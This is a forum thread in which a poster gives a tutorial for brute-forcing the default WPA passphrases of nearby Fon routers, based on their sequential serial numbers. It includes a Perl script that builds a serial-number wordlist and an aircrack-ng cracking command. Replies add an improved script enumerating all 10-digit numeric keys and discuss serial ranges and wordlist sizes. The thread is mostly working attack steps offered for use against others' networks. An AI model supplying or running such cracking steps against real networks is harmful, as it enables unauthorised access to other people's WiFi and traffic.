Page 1 of 2 12 LastLast
Results 1 to 10 of 16

Thread: How to Bruteforce a WPA Fon Wlan

  1. #1

    Default How to Bruteforce a WPA Fon Wlan

    Hey Community,


    In this little Tutorial i'm gonna show you, hot to Bruteforce nearby Fon Routers

    So the interesting thing which I note, is that a Fon AP's default WPA passphrase is it's serial number, printed under the box. These serial numbers are sequential, thus making it very easy to guess their entire range.

    So for this i use a little Perl Script, which generates a file, included all Numbers from 807200000 till 8702555555
    Code:
    #!/usr/bin/perl
    $n = 8702000000;
    while ($n <= 8702555555) { system ("echo $n >> numbers.txt"); $n++; }
    So then we need a WPA Handshake to try out. I'm not gonna describe how you get one because there are million Posts about it.

    Then we Simply use Aircrack and start Bruteforcing

    aircrack-ng fon-01.cap -w /root/fon/numbers.txt

    So this is it Cracked.

    IF you have further questions feel free to a PM or visit my Blog.
    In German = My_0wn_Remote
    In English = my_english_remote

    I also created a littel Tutorial Video for this whole thing

    YouTube - How to Bruteforce a nearby WPA Fon Wlan [3]

    Maybee it is worth for the Video Section, i can't measure

    =) Reeth
    www.myownremote.blogspot.com

  2. #2
    Senior Member orange's Avatar
    Join Date
    Jan 2010
    Posts
    134

    Default

    included all Numbers from 807200000 till 8702555555
    How do you come to that assumption? I have 7 Foneras (2100 model) and all my serial numbers are out of that particular range. JFYI, there already have been some efforts from FoneraHacks forums-member verticalfall to create precomputed WPA tables for the MyPlace SSID (covering several ranges of Fonera serial numbers) - unfortunately I cannot find the link currently though.

    Nice project!

  3. #3

    Default

    hey or4n9e
    yeah that could be possible, that it not fits in your country maybee they change the Serial Number in different Countries...but i don't think so...
    I also have 2 Fonera 2100 Routers but they all got S/N with 8072....Numbers...
    www.myownremote.blogspot.com

  4. #4
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851

    Default

    Quote Originally Posted by Reeth View Post
    but they all got S/N with 8072....Numbers...
    Have a look through the various forums around the place, I can assure you that, like the man said, they do not all fall within the 8072 range.

    That said, the sheer size of the serial key not withstanding, you could just compute the numerics for all the possibilities at that width of serial numbers (10^10 or something - it's early and my math-fu is weak without coffee). It wouldn't even be hard to do, so let me try hack something up while I write this post (it will be untested ):
    Code:
    #!/usr/bin/perl
    open(DICT, ">outputfile.txt") || die "Bugger: $!";
    my $i = "0000000000";
    while($i < 10000000000) {
        my $j = sprintf("%010d", $i);
        print DICT "$j\n";
        $i++;
    }
    close(DICT);
    The numbers are large, you are dealing with 10,000,000,000 possibilities which is a lot, a pyrit box might be able to generate them fast enough, but for my taste that is a bit of a stretch.

    That would work for any 10 numeric digit WPA key by the way, and removes the need for targeted mishaps like the original.

    Also it removes that terrible call to echo which would slow the generation down.
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  5. #5
    My life is this forum Snayler's Avatar
    Join Date
    Jan 2010
    Posts
    1,418

    Default

    My fon S/N starts with 8704... Seems that the only number that repeats itself is the first "8"...

  6. #6
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default

    I have a word list which contains all possible combinations of 10 digit hex and it is about 37 gigs, just FYI

  7. #7

    Default

    My fon S/N starts with 8704... Seems that the only number that repeats itself is the first "8"...
    you ment the first 3 ? because the range i did create was from 807200000 till 8702555555

    @Snalyer what kind of fon did you use ?

    What are the standard Ranges for

    Fon ?
    Fon+
    .....
    are there any correlations ?
    www.myownremote.blogspot.com

  8. #8
    My life is this forum Snayler's Avatar
    Join Date
    Jan 2010
    Posts
    1,418

    Default

    Quote Originally Posted by Reeth View Post
    you ment the first 3 ? because the range i did create was from 807200000 till 8702555555
    Sorry, i misread your post. I thought it was from 807200000 to 807255555. But still, it wouldn't get my default WPA password.

    Quote Originally Posted by Reeth View Post
    @Snalyer what kind of fon did you use ?
    FON2100A/B/C

  9. #9
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851

    Default

    Quote Originally Posted by pureh@te View Post
    I have a word list which contains all possible combinations of 10 digit hex and it is about 37 gigs, just FYI
    hex as in A to F as well?

    How long does it take your pyrit box to get through that list (is it included in the timing stats we've already seen) ?
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  10. #10
    Senior Member kidFromBigD's Avatar
    Join Date
    Jan 2010
    Location
    Texas
    Posts
    159

    Default

    Quote Originally Posted by pureh@te View Post
    I have a word list which contains all possible combinations of 10 digit hex and it is about 37 gigs, just FYI
    Quote Originally Posted by Gitsnik View Post
    hex as in A to F as well?

    How long does it take your pyrit box to get through that list (is it included in the timing stats we've already seen) ?
    Hey pureh@te -- do you mean to say your wordlist is 8 digits of hex, 0->F inclusive? I just did a quick calculation and that file would be ~37Gig, so just wondering if that's what you mean? Thanks!
    You. Are. Doing. It. Wrong.
    -Gitsnik

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •